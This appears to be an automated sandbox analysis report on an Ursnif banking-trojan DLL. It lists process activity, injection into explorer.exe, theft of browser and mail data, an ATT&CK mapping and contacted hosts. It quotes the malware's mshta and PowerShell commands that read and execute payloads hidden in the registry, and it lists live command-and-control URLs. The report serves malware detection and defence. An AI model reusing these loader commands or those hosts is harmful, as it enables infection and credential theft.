Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000025.00000000.450806472.0000000005EA0000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000002.636715149.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02F693D5 cpuid

0_2_02F693D5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_015110FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_015110FC

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02F693D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_02F693D5

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0151179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_0151179C

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Process Injection712	Software Packing1	Credential API Hooking3	Peripheral Device Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell1	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Input Capture1	Account Discovery1	SMB/Windows Admin Shares	Email Collection11	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	File and Directory Discovery2	Distributed Component Object Model	Credential API Hooking3	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	System Information Discovery26	SSH	Input Capture1	Data Transfer Size Limits	Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion3	Cached Domain Credentials	Query Registry1	VNC	Clipboard Data1	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection712	DCSync	Security Software Discovery21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Virtualization/Sandbox Evasion3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Application Window Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5fd9d7ec9e7aetar.dll	13%	Virustotal		Browse
5fd9d7ec9e7aetar.dll	10%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.2f60000.3.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
0.2.loaddll32.exe.1500000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File

Domains

Source	Detection	Scanner	Link
rosadalking.xyz	6%	Virustotal	Browse
1.0.0.127.in-addr.arpa	0%	Virustotal	Browse
8.8.8.8.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/x	0%	Avira URL Cloud	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://rosadalking.xyz/images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDs	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8	0%	Avira URL Cloud	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rosadalking.xyz	193.56.255.167	true	true	6%, Virustotal, Browse	unknown
pagead46.l.doubleclick.net	216.58.210.2	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
1.0.0.127.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown
8.8.8.8.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001C.00000002.476825064.00000224909E1000.00000004.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.4.dr	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/x	loaddll32.exe, 00000000.00000003.375700561.00000000015B7000.00000004.00000001.sdmp, explorer.exe, 00000025.00000000.449476273.0000000005509000.00000004.00000001.sdmp, ~DF907A0632D9B8351A.TMP.21.dr, {F0C73B57-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr	true	Avira URL Cloud: safe	unknown
http://search.rediff.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
